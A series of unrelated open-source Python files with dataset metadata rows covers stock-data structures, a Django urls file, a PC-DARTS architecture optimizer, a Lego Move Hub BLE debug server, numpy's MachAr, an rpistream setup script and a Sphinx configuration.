均价:MONEY/VOL;
}
ELSE IF (MARKETTYPE == 176)
{
b=SUBSAMEDAY(&MONEY);
m=SUM(b*最新,0);
IF(m>0)
均价:m/MONEY;
}
}
ELSE
{
均价:RANGE_AVG_PRICE;
}
DRAWGBK(MARKETTYPE==32 AND FORMATTIME(1)<10 AND TRADETIME>242),RGB(0,0,128);
RETURN;
hx_star;
hx_star_p;
"""
def __repr__(self):
return '< QA_DataStruct_Stock_Transaction >'
def __call__(self):
return self.data
def resample(self, type_='1min'):
"""resample methods
Returns:
[type] -- [description]
"""
return QA_DataStruct_Stock_min(QA_data_tick_resample(self.data, type_))
def get_big_orders(self, bigamount=1000000):
"""return big order
Keyword Arguments:
bigamount {[type]} -- [description] (default: {1000000})
Returns:
[type] -- [description]
"""
return self.data.query('amount>={}'.format(bigamount))
def get_medium_order(self, lower=200000, higher=1000000):
"""return medium
Keyword Arguments:
lower {[type]} -- [description] (default: {200000})
higher {[type]} -- [description] (default: {1000000})
Returns:
[type] -- [description]
"""
return self.data.query('amount>={}'.format(lower)).query('amount<={}'.format(higher))
def get_small_order(self, smallamount=200000):
"""return small level order
Keyword Arguments:
smallamount {[type]} -- [description] (default: {200000})
Returns:
[type] -- [description]
"""
return self.data.query('amount<={}'.format(smallamount))
def get_time(self, start, end=None):
if end is None:
return self.data.loc[start]
else:
return self.data.loc[start:end]
class _realtime_base():
"""
realtime 基类
主要字段有:
code/name
time
open/high/low
买卖报价队列:(不同的可能不一样 只提供list)
ask_list[ask1_price/ask1_volume|ask2_price/ask2_volume|ask3_price/ask3_volume....]
bid_list[bid1_price/bid1_volume|bid2_price/bid2_volume|bid3_price/bid3_volume....]
"""
def __init__(self, market_data):
"""转化成dict模式
Arguments:
market_data {[type]} -- [description]
"""
if isinstance(market_data, dict):
self.data = market_data
elif isinstance(market_data, pd.DataFrame):
self.data = QA_util_to_json_from_pandas(market_data)
@property
def open(self):
return self.data.get('open', None)
@property
def price(self):
return self.data.get('price', None)
@property
def datetime(self):
return self.data.get('datetime', None)
@property
def high(self):
return self.data.get('high', None)
@property
def low(self):
return self.data.get('low', None)
@property
def code(self):
return self.data.get('code', None)
@property
def last_close(self):
return self.data.get('last_close', None)
@property
def cur_vol(self):
return self.data.get('cur_vol', None)
@property
def bid1(self):
return self.data.get('bid1', None)
@property
def bid_vol1(self):
return self.data.get('bid_vol1', None)
@property
def bid2(self):
return self.data.get('bid2', None)
@property
def bid_vol2(self):
return self.data.get('bid_vol2', None)
@property
def bid3(self):
return self.data.get('bid3', None)
@property
def bid_vol3(self):
return self.data.get('bid_vol3', None)
@property
def bid4(self):
return self.data.get('bid4', None)
@property
def bid_vol4(self):
return self.data.get('bid_vol4', None)
@property
def bid5(self):
return self.data.get('bid5', None)
@property
def bid_vol5(self):
return self.data.get('bid_vol5', None)
@property
def ask1(self):
return self.data.get('ask1', None)
@property
def ask_vol1(self):
return self.data.get('ask_vol1', None)
@property
def ask2(self):
return self.data.get('ask2', None)
@property
def ask_vol2(self):
return self.data.get('ask_vol2', None)
@property
def ask3(self):
return self.data.get('ask3', None)
@property
def ask_vol3(self):
return self.data.get('ask_vol3', None)
@property
def ask4(self):
return self.data.get('ask4', None)
@property
def ask_vol4(self):
return self.data.get('ask_vol4', None)
@property
def ask5(self):
return self.data.get('ask5', None)
@property
def ask_vol5(self):
return self.data.get('ask_vol5', None)
class QA_DataStruct_Stock_realtime(_realtime_base):
def __init__(self, data):
self.data = data
def __repr__(self):
return '< QA_REALTIME_STRUCT code {} start {} end {} >'.format(self.code.unique(), self.datetime.iloc[1], self.datetime.iloc[-1])
# @property
# def ask_list(self):
# return self.data.loc[:, ['ask1', 'ask_vol1', 'bid1', 'bid_vol1', 'ask2', 'ask_vol2',
# 'bid2', 'bid_vol2', 'ask3', 'ask_vol3', 'bid3', 'bid_vol3', 'ask4',
# 'ask_vol4', 'bid4', 'bid_vol4', 'ask5', 'ask_vol5', 'bid5', 'bid_vol5']]
# @property
# def bid_list(self):
# return self.data.loc[:, ['bid1', 'bid_vol1', 'bid2', 'bid_vol2', 'bid3', 'bid_vol3', 'bid4', 'bid_vol4', 'bid5', 'bid_vol5']]
@property
def _data(self):
"""
return a dataframe-type result
"""
return pd.DataFrame(self.data)
@property
def ab_board(self):
"""ask_bid board
bid3 bid_vol3
bid2 bid_vol2
bid1 bid_vol1
===============
price /cur_vol
===============
ask1 ask_vol1
ask2 ask_vol2
ask3 ask_vol3
"""
return 'BID5 {} {} \nBID4 {} {} \nBID3 {} {} \nBID2 {} {} \nBID1 {} {} \n============\nCURRENT {} {} \n============\
\nASK1 {} {} \nASK2 {} {} \nASK3 {} {} \nASK4 {} {} \nASK5 {} {} \nTIME {} CODE {} '.format(
self.bid5, self.bid_vol5, self.bid4, self.bid_vol4, self.bid3, self.bid_vol3, self.bid2, self.bid_vol2, self.bid1, self.bid_vol1,
self.price, self.cur_vol,
self.ask1, self.ask_vol1, self.ask2, self.ask_vol2, self.ask3, self.ask_vol3, self.ask4, self.ask_vol4, self.ask5, self.ask_vol5,
self.datetime, self.code
)
def serialize(self):
"""to_protobuf
"""
pass
def resample(self, level):
return QA_data_tick_resample(self.data, level)
class QA_DataStruct_Stock_realtime_series():
def __init__(self, sr_series):
if isinstance(sr_series[0], QA_DataStruct_Stock_realtime):
self.sr_series = sr_series
elif isinstance(sr_series[0], dict):
self.sr_series = [
QA_DataStruct_Stock_realtime(sr) for sr in sr_series]
self.table = pd.concat([sr._data for sr in self.sr_series])
class QA_DataStruct_Security_list():
def __init__(self, DataFrame):
self.data = DataFrame.loc[:, ['sse', 'code', 'name']].set_index(
'code', drop=False)
@property
def code(self):
return self.data.code
@property
def name(self):
return self.data.name
def get_stock(self, ST_option):
return self.data
def get_index(self):
return self.data
def get_etf(self):
return self.data
| 27.056009 | 191 | 0.577436 |
d3e047ba968ed5543fdc2df37e4ef7caae1a4e3b | 282 | py | Python | oldp/apps/contact/urls.py | docsuleman/oldp | 8dcaa8e6e435794c872346b5014945ace885adb4 | [
"MIT"
] | 66 | 2018-05-07T12:34:39.000Z | 2022-02-23T20:14:24.000Z | oldp/apps/contact/urls.py | Justice-PLP-DHV/oldp | eadf235bb0925453d9a5b81963a0ce53afeb17fd | [
"MIT"
] | 68 | 2018-06-11T16:13:17.000Z | 2022-02-10T08:03:26.000Z | oldp/apps/contact/urls.py | Justice-PLP-DHV/oldp | eadf235bb0925453d9a5b81963a0ce53afeb17fd | [
"MIT"
] | 15 | 2018-06-23T19:41:13.000Z | 2021-08-18T08:21:49.000Z | from django.conf.urls import url
from . import views
app_name = 'contact'
urlpatterns = [
url(r'^$', views.form_view, name='form'),
url(r'^report_content$', views.report_content_view, name='report_content'),
url(r'^thankyou', views.thankyou_view, name='thankyou'),
]
| 23.5 | 79 | 0.695035 |
2799c38f7607a98f6e70400c29c06184ad9bd84a | 3,675 | py | Python | PCDARTS/architect.py | AllenChen1998/QueryNet | 1ab74d7f4cc9d25af30abe0631581cf7be81a07f | [
"Apache-2.0"
] | 2 | 2022-01-09T11:09:17.000Z | 2022-03-29T14:16:32.000Z | PCDARTS/architect.py | AllenChen1998/QueryNet | 1ab74d7f4cc9d25af30abe0631581cf7be81a07f | [
"Apache-2.0"
] | null | null | null | PCDARTS/architect.py | AllenChen1998/QueryNet | 1ab74d7f4cc9d25af30abe0631581cf7be81a07f | [
"Apache-2.0"
] | null | null | null | import torch
import numpy as np
import torch.nn as nn
from torch.autograd import Variable
def _concat(xs):
return torch.cat([x.view(-1) for x in xs])
class Architect(object):
def __init__(self, model, momentum, weight_decay, arch_learning_rate, arch_weight_decay):#args):
self.network_momentum = momentum#args.momentum
self.network_weight_decay = weight_decay#args.weight_decay
self.model = model
self.optimizer = torch.optim.Adam(self.model.arch_parameters(),
lr=arch_learning_rate,#args.arch_learning_rate,
betas=(0.5, 0.999),
weight_decay=arch_weight_decay#args.arch_weight_decay
)
def _compute_unrolled_model(self, input, target, eta, network_optimizer):
loss = self.model._loss(input, target)
theta = _concat(self.model.parameters()).data
try:
moment = _concat(network_optimizer.state[v]['momentum_buffer'] for v in self.model.parameters()).mul_(self.network_momentum)
except:
moment = torch.zeros_like(theta)
dtheta = _concat(torch.autograd.grad(loss, self.model.parameters())).data + self.network_weight_decay*theta
unrolled_model = self._construct_model_from_theta(theta.sub(eta, moment+dtheta))
return unrolled_model
def step(self, input_train, target_train, input_valid, target_valid, eta, network_optimizer, unrolled):
self.optimizer.zero_grad()
if unrolled:
self._backward_step_unrolled(input_train, target_train, input_valid, target_valid, eta, network_optimizer)
else:
self._backward_step(input_valid, target_valid)
self.optimizer.step()
def _backward_step(self, input_valid, target_valid):
loss = self.model._loss(input_valid, target_valid)
loss.backward()
def _backward_step_unrolled(self, input_train, target_train, input_valid, target_valid, eta, network_optimizer):
unrolled_model = self._compute_unrolled_model(input_train, target_train, eta, network_optimizer)
unrolled_loss = unrolled_model._loss(input_valid, target_valid)
unrolled_loss.backward()
dalpha = [v.grad for v in unrolled_model.arch_parameters()]
vector = [v.grad.data for v in unrolled_model.parameters()]
implicit_grads = self._hessian_vector_product(vector, input_train, target_train)
for g, ig in zip(dalpha, implicit_grads):
g.data.sub_(eta, ig.data)
for v, g in zip(self.model.arch_parameters(), dalpha):
if v.grad is None:
v.grad = Variable(g.data)
else:
v.grad.data.copy_(g.data)
def _construct_model_from_theta(self, theta):
model_new = self.model.new()
model_dict = self.model.state_dict()
params, offset = {}, 0
for k, v in self.model.named_parameters():
v_length = np.prod(v.size())
params[k] = theta[offset: offset+v_length].view(v.size())
offset += v_length
assert offset == len(theta)
model_dict.update(params)
model_new.load_state_dict(model_dict)
return model_new.cuda()
def _hessian_vector_product(self, vector, input, target, r=1e-2):
R = r / _concat(vector).norm()
for p, v in zip(self.model.parameters(), vector):
p.data.add_(R, v)
loss = self.model._loss(input, target)
grads_p = torch.autograd.grad(loss, self.model.arch_parameters())
for p, v in zip(self.model.parameters(), vector):
p.data.sub_(2*R, v)
loss = self.model._loss(input, target)
grads_n = torch.autograd.grad(loss, self.model.arch_parameters())
for p, v in zip(self.model.parameters(), vector):
p.data.add_(R, v)
return [(x-y).div_(2*R) for x, y in zip(grads_p, grads_n)]
| 38.28125 | 131 | 0.693333 |
bb5331565b8cd95e8fc5b54d814e9b3db2c514bd | 5,979 | py | Python | pylgbst/comms/__init__.py | karatheodory/pylgbst | 2aa82a818623fe8ecb8a6fc1c6ae083e56debd19 | [
"MIT"
] | 1 | 2021-04-04T13:31:28.000Z | 2021-04-04T13:31:28.000Z | pylgbst/comms/__init__.py | karatheodory/pylgbst | 2aa82a818623fe8ecb8a6fc1c6ae083e56debd19 | [
"MIT"
] | null | null | null | pylgbst/comms/__init__.py | karatheodory/pylgbst | 2aa82a818623fe8ecb8a6fc1c6ae083e56debd19 | [
"MIT"
] | null | null | null | """
This package holds communication aspects
"""
import binascii
import json
import logging
import socket
import traceback
from abc import abstractmethod
from binascii import unhexlify
from threading import Thread
from pylgbst.constants import MSG_DEVICE_SHUTDOWN, ENABLE_NOTIFICATIONS_HANDLE, ENABLE_NOTIFICATIONS_VALUE
from pylgbst.utilities import str2hex
log = logging.getLogger('comms')
LEGO_MOVE_HUB = "LEGO Move Hub"
class Connection(object):
def connect(self, hub_mac=None):
pass
@abstractmethod
def is_alive(self):
pass
def disconnect(self):
pass
@abstractmethod
def write(self, handle, data):
pass
@abstractmethod
def set_notify_handler(self, handler):
pass
def enable_notifications(self):
self.write(ENABLE_NOTIFICATIONS_HANDLE, ENABLE_NOTIFICATIONS_VALUE)
class DebugServer(object):
"""
Starts TCP server to be used with DebugServerConnection to speed-up development process
It holds BLE connection to Move Hub, so no need to re-start it every time
Usage: DebugServer(BLEConnection().connect()).start()
:type connection: BLEConnection
"""
def __init__(self, connection):
self._running = False
self.sock = socket.socket()
self.connection = connection
def start(self, port=9090):
self.sock.bind(('', port))
self.sock.listen(1)
self._running = True
while self._running:
log.info("Accepting MoveHub debug connections at %s", port)
conn, addr = self.sock.accept()
if not self._running:
raise KeyboardInterrupt("Shutdown")
self.connection.set_notify_handler(lambda x, y: self._notify(conn, x, y))
try:
self._handle_conn(conn)
except KeyboardInterrupt:
raise
except BaseException:
log.error("Problem handling incoming connection: %s", traceback.format_exc())
finally:
self.connection.set_notify_handler(self._notify_dummy)
conn.close()
def __del__(self):
self.sock.close()
def _notify_dummy(self, handle, data):
log.debug("Dropped notification from handle %s: %s", handle, binascii.hexlify(data))
self._check_shutdown(data)
def _notify(self, conn, handle, data):
payload = {"type": "notification", "handle": handle, "data": str2hex(data)}
log.debug("Send notification: %s", payload)
try:
conn.send(json.dumps(payload) + "\n")
except KeyboardInterrupt:
raise
except BaseException:
log.error("Problem sending notification: %s", traceback.format_exc())
self._check_shutdown(data)
def _check_shutdown(self, data):
if data[5] == MSG_DEVICE_SHUTDOWN:
log.warning("Device shutdown")
self._running = False
def _handle_conn(self, conn):
"""
:type conn: socket._socketobject
"""
buf = ""
while True:
data = conn.recv(1024)
log.debug("Recv: %s", data.strip())
if not data:
break
buf += data
if "\n" in buf:
line = buf[:buf.index("\n")]
buf = buf[buf.index("\n") + 1:]
if line:
log.info("Cmd line: %s", line)
try:
self._handle_cmd(json.loads(line))
except KeyboardInterrupt:
raise
except BaseException:
log.error("Failed to handle cmd: %s", traceback.format_exc())
def _handle_cmd(self, cmd):
if cmd['type'] == 'write':
self.connection.write(cmd['handle'], unhexlify(cmd['data']))
else:
raise ValueError("Unhandled cmd: %s", cmd)
class DebugServerConnection(Connection):
"""
Connection type to be used with DebugServer, replaces BLEConnection
"""
def __init__(self, port=9090):
super(DebugServerConnection, self).__init__()
self.notify_handler = None
self.buf = ""
self.sock = socket.socket()
self.sock.connect(('localhost', port))
self.incoming = []
self.reader = Thread(target=self._recv)
self.reader.setName("Debug connection reader")
self.reader.setDaemon(True)
self.reader.start()
def __del__(self):
self.sock.close()
def write(self, handle, data):
payload = {
"type": "write",
"handle": handle,
"data": str2hex(data)
}
self._send(payload)
def _send(self, payload):
log.debug("Sending to debug server: %s", payload)
self.sock.send(json.dumps(payload) + "\n")
def _recv(self):
while True:
data = self.sock.recv(1024)
log.debug("Recv from debug server: %s", data.strip())
if not data:
raise KeyboardInterrupt("Server has closed connection")
self.buf += data
while "\n" in self.buf:
line = self.buf[:self.buf.index("\n")]
self.buf = self.buf[self.buf.index("\n") + 1:]
if line:
item = json.loads(line)
if item['type'] == 'notification' and self.notify_handler:
try:
self.notify_handler(item['handle'], unhexlify(item['data']))
except BaseException:
log.error("Failed to notify handler: %s", traceback.format_exc())
elif item['type'] == 'response':
self.incoming.append(item)
else:
log.warning("Dropped inbound: %s", item)
def set_notify_handler(self, handler):
self.notify_handler = handler
| 30.661538 | 106 | 0.567319 |
72fde37f2bfde474bc6fc1007bd65e35e436e660 | 9,398 | py | Python | resources/mgltools_x86_64Linux2_1.5.6/lib/python2.5/site-packages/numpy/lib/machar.py | J-E-J-S/aaRS-Pipeline | 43f59f28ab06e4b16328c3bc405cdddc6e69ac44 | [
"MIT"
] | null | null | null | resources/mgltools_x86_64Linux2_1.5.6/lib/python2.5/site-packages/numpy/lib/machar.py | J-E-J-S/aaRS-Pipeline | 43f59f28ab06e4b16328c3bc405cdddc6e69ac44 | [
"MIT"
] | null | null | null | resources/mgltools_x86_64Linux2_1.5.6/lib/python2.5/site-packages/numpy/lib/machar.py | J-E-J-S/aaRS-Pipeline | 43f59f28ab06e4b16328c3bc405cdddc6e69ac44 | [
"MIT"
] | null | null | null | """
Machine arithmetics - determine the parameters of the
floating-point arithmetic system
"""
# Author: Pearu Peterson, September 2003
__all__ = ['MachAr']
from numpy.core.fromnumeric import any
from numpy.core.numeric import seterr
# Need to speed this up...especially for longfloat
class MachAr(object):
"""Diagnosing machine parameters.
The following attributes are available:
ibeta - radix in which numbers are represented
it - number of base-ibeta digits in the floating point mantissa M
machep - exponent of the smallest (most negative) power of ibeta that,
added to 1.0,
gives something different from 1.0
eps - floating-point number beta**machep (floating point precision)
negep - exponent of the smallest power of ibeta that, substracted
from 1.0, gives something different from 1.0
epsneg - floating-point number beta**negep
iexp - number of bits in the exponent (including its sign and bias)
minexp - smallest (most negative) power of ibeta consistent with there
being no leading zeros in the mantissa
xmin - floating point number beta**minexp (the smallest (in
magnitude) usable floating value)
maxexp - smallest (positive) power of ibeta that causes overflow
xmax - (1-epsneg)* beta**maxexp (the largest (in magnitude)
usable floating value)
irnd - in range(6), information on what kind of rounding is done
in addition, and on how underflow is handled
ngrd - number of 'guard digits' used when truncating the product
of two mantissas to fit the representation
epsilon - same as eps
tiny - same as xmin
huge - same as xmax
precision - int(-log10(eps))
resolution - 10**(-precision)
Reference:
Numerical Recipies.
"""
def __init__(self, float_conv=float,int_conv=int,
float_to_float=float,
float_to_str = lambda v:'%24.16e' % v,
title = 'Python floating point number'):
"""
float_conv - convert integer to float (array)
int_conv - convert float (array) to integer
float_to_float - convert float array to float
float_to_str - convert array float to str
title - description of used floating point numbers
"""
# We ignore all errors here because we are purposely triggering
# underflow to detect the properties of the runninng arch.
saverrstate = seterr(under='ignore')
try:
self._do_init(float_conv, int_conv, float_to_float, float_to_str, title)
finally:
seterr(**saverrstate)
def _do_init(self, float_conv, int_conv, float_to_float, float_to_str, title):
max_iterN = 10000
msg = "Did not converge after %d tries with %s"
one = float_conv(1)
two = one + one
zero = one - one
# Do we really need to do this? Aren't they 2 and 2.0?
# Determine ibeta and beta
a = one
for _ in xrange(max_iterN):
a = a + a
temp = a + one
temp1 = temp - a
if any(temp1 - one != zero):
break
else:
raise RuntimeError, msg % (_, one.dtype)
b = one
for _ in xrange(max_iterN):
b = b + b
temp = a + b
itemp = int_conv(temp-a)
if any(itemp != 0):
break
else:
raise RuntimeError, msg % (_, one.dtype)
ibeta = itemp
beta = float_conv(ibeta)
# Determine it and irnd
it = -1
b = one
for _ in xrange(max_iterN):
it = it + 1
b = b * beta
temp = b + one
temp1 = temp - b
if any(temp1 - one != zero):
break
else:
raise RuntimeError, msg % (_, one.dtype)
betah = beta / two
a = one
for _ in xrange(max_iterN):
a = a + a
temp = a + one
temp1 = temp - a
if any(temp1 - one != zero):
break
else:
raise RuntimeError, msg % (_, one.dtype)
temp = a + betah
irnd = 0
if any(temp-a != zero):
irnd = 1
tempa = a + beta
temp = tempa + betah
if irnd==0 and any(temp-tempa != zero):
irnd = 2
# Determine negep and epsneg
negep = it + 3
betain = one / beta
a = one
for i in range(negep):
a = a * betain
b = a
for _ in xrange(max_iterN):
temp = one - a
if any(temp-one != zero):
break
a = a * beta
negep = negep - 1
# Prevent infinite loop on PPC with gcc 4.0:
if negep < 0:
raise RuntimeError, "could not determine machine tolerance " \
"for 'negep', locals() -> %s" % (locals())
else:
raise RuntimeError, msg % (_, one.dtype)
negep = -negep
epsneg = a
# Determine machep and eps
machep = - it - 3
a = b
for _ in xrange(max_iterN):
temp = one + a
if any(temp-one != zero):
break
a = a * beta
machep = machep + 1
else:
raise RuntimeError, msg % (_, one.dtype)
eps = a
# Determine ngrd
ngrd = 0
temp = one + eps
if irnd==0 and any(temp*one - one != zero):
ngrd = 1
# Determine iexp
i = 0
k = 1
z = betain
t = one + eps
nxres = 0
for _ in xrange(max_iterN):
y = z
z = y*y
a = z*one # Check here for underflow
temp = z*t
if any(a+a == zero) or any(abs(z)>=y):
break
temp1 = temp * betain
if any(temp1*beta == z):
break
i = i + 1
k = k + k
else:
raise RuntimeError, msg % (_, one.dtype)
if ibeta != 10:
iexp = i + 1
mx = k + k
else:
iexp = 2
iz = ibeta
while k >= iz:
iz = iz * ibeta
iexp = iexp + 1
mx = iz + iz - 1
# Determine minexp and xmin
for _ in xrange(max_iterN):
xmin = y
y = y * betain
a = y * one
temp = y * t
if any(a+a != zero) and any(abs(y) < xmin):
k = k + 1
temp1 = temp * betain
if any(temp1*beta == y) and any(temp != y):
nxres = 3
xmin = y
break
else:
break
else:
raise RuntimeError, msg % (_, one.dtype)
minexp = -k
# Determine maxexp, xmax
if mx <= k + k - 3 and ibeta != 10:
mx = mx + mx
iexp = iexp + 1
maxexp = mx + minexp
irnd = irnd + nxres
if irnd >= 2:
maxexp = maxexp - 2
i = maxexp + minexp
if ibeta == 2 and not i:
maxexp = maxexp - 1
if i > 20:
maxexp = maxexp - 1
if any(a != y):
maxexp = maxexp - 2
xmax = one - epsneg
if any(xmax*one != xmax):
xmax = one - beta*epsneg
xmax = xmax / (xmin*beta*beta*beta)
i = maxexp + minexp + 3
for j in range(i):
if ibeta==2:
xmax = xmax + xmax
else:
xmax = xmax * beta
self.ibeta = ibeta
self.it = it
self.negep = negep
self.epsneg = float_to_float(epsneg)
self._str_epsneg = float_to_str(epsneg)
self.machep = machep
self.eps = float_to_float(eps)
self._str_eps = float_to_str(eps)
self.ngrd = ngrd
self.iexp = iexp
self.minexp = minexp
self.xmin = float_to_float(xmin)
self._str_xmin = float_to_str(xmin)
self.maxexp = maxexp
self.xmax = float_to_float(xmax)
self._str_xmax = float_to_str(xmax)
self.irnd = irnd
self.title = title
# Commonly used parameters
self.epsilon = self.eps
self.tiny = self.xmin
self.huge = self.xmax
import math
self.precision = int(-math.log10(float_to_float(self.eps)))
ten = two + two + two + two + two
resolution = ten ** (-self.precision)
self.resolution = float_to_float(resolution)
self._str_resolution = float_to_str(resolution)
def __str__(self):
return '''\
Machine parameters for %(title)s
---------------------------------------------------------------------
ibeta=%(ibeta)s it=%(it)s iexp=%(iexp)s ngrd=%(ngrd)s irnd=%(irnd)s
machep=%(machep)s eps=%(_str_eps)s (beta**machep == epsilon)
negep =%(negep)s epsneg=%(_str_epsneg)s (beta**epsneg)
minexp=%(minexp)s xmin=%(_str_xmin)s (beta**minexp == tiny)
maxexp=%(maxexp)s xmax=%(_str_xmax)s ((1-epsneg)*beta**maxexp == huge)
---------------------------------------------------------------------
''' % self.__dict__
if __name__ == '__main__':
print MachAr()
| 31.75 | 84 | 0.503618 |
133225901fd5c57b3f3937a463aaa96d1fe82e61 | 1,761 | py | Python | lib/rpistream/setup.py | thatguy1234510/rpi_stream_img | d3a2cc346d9ae5303b0d8990ea7a0ea8c6d85637 | [
"MIT"
] | 2 | 2019-11-04T09:33:44.000Z | 2021-02-28T16:06:30.000Z | lib/rpistream/setup.py | thatguy1234510/rpi_stream_img | d3a2cc346d9ae5303b0d8990ea7a0ea8c6d85637 | [
"MIT"
] | 8 | 2018-08-01T22:41:32.000Z | 2018-10-15T21:48:33.000Z | lib/rpistream/setup.py | thatguy1234510/rpi_stream_img | d3a2cc346d9ae5303b0d8990ea7a0ea8c6d85637 | [
"MIT"
] | null | null | null | import setuptools
long_description="""# RaspiCameraLivestream
### A very simple library built for streaming video from a remote Raspberry Pi server in realtime.
---
## How to install:
### MacOS or linux:
Open your terminal and type:
``` bash
sudo python -m pip install rpistream
```
### Windows:
Open cmd as admin and type:
```cmd
pip install rpistream
```
---
## Examples:
### Streaming from a webcam
Server
```python
from rpistream.camera import Camera
from rpistream.streamserver import Server
def retrieveImage(cam,imgResize):
image = cv2.resize(cam.image,(0,0),fx=imgResize,fy=imgResize)
return image
cam = Camera(mirror=True)
scale=0.5
server = Server(port=5000)
server.serve() # Blocking; waits for a connection before continuing
server.startStream(retrieveImage,[cam,scale]) # Calls retrieveImage(*args) every frame
```
Client
```python
from rpistream.streamclient import Client
client = Client(serverIp="localhost", WriteFile=True) # Connects to the server
client.startStream() # Starts recieving data and displaying the video
```
"""
setuptools.setup(
name="rpistream",
version="0.2.2",
author="Theo Cooper and Ian Huang",
author_email="theoac2009@outlook.com",
description="A very simple library built for streaming video from a remote Raspberry Pi server in realtime.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/thatguy1234510/rpistream",
packages=setuptools.find_packages(),
classifiers=(
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
),
install_requires=[
'zstandard'
#'opencv-python'
]
) | 22.291139 | 113 | 0.71096 |
484e1321817f004c2f06cc3d1d70f41523918835 | 77 | py | Python | src/main/python/ui/distribution/__init__.py | boom-roasted/ImageWAO | 944505dab1a7c97b8eae2bf9fb30006d0f471f89 | [
"MIT"
] | 1 | 2020-03-22T01:52:52.000Z | 2020-03-22T01:52:52.000Z | src/main/python/ui/distribution/__init__.py | leftaltkey/ImageWAO | 944505dab1a7c97b8eae2bf9fb30006d0f471f89 | [
"MIT"
] | 2 | 2021-06-08T21:12:47.000Z | 2021-06-08T21:30:32.000Z | src/main/python/ui/distribution/__init__.py | leftaltkey/ImageWAO | 944505dab1a7c97b8eae2bf9fb30006d0f471f89 | [
"MIT"
] | null | null | null | from .distributionform import DistributionForm
__all__ = [DistributionForm]
| 19.25 | 46 | 0.844156 |
f48a868c0ac914f3c0075ac4e43a052567ff7fa8 | 10,211 | py | Python | docs/source/conf.py | agramfort/POT | 8dbfd3edae649f5f3e87be4a3ce446c59729b2f7 | [
"MIT"
] | null | null | null | docs/source/conf.py | agramfort/POT | 8dbfd3edae649f5f3e87be4a3ce446c59729b2f7 | [
"MIT"
] | null | null | null | docs/source/conf.py | agramfort/POT | 8dbfd3edae649f5f3e87be4a3ce446c59729b2f7 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# POT documentation build configuration file, created by
# sphinx-quickstart on Mon Oct 24 11:10:10 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import re
#try:
from unittest.mock import MagicMock
#except ImportError:
# from mock import MagicMock
sys.path.insert(0, os.path.abspath("../.."))
#sys.setrecursionlimit(1500)
class Mock(MagicMock):
@classmethod
def __getattr__(cls, name):
return Mock()
MOCK_MODULES = [ 'emd','ot.lp.emd']
sys.modules.update((mod_name, Mock()) for mod_name in MOCK_MODULES)
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode', 'sphinx.ext.napoleon'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'POT Python Optimal Transport library'
copyright = u'2016, Rémi Flamary, Nicolas Courty'
author = u'Rémi Flamary, Nicolas Courty'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
__version__ = re.search(
r'__version__\s*=\s*[\'"]([^\'"]*)[\'"]', # It excludes inline comment too
open('../../ot/__init__.py').read()).group(1)
# The short X.Y version.
version = __version__
# The full version, including alpha/beta/rc tags.
release = __version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
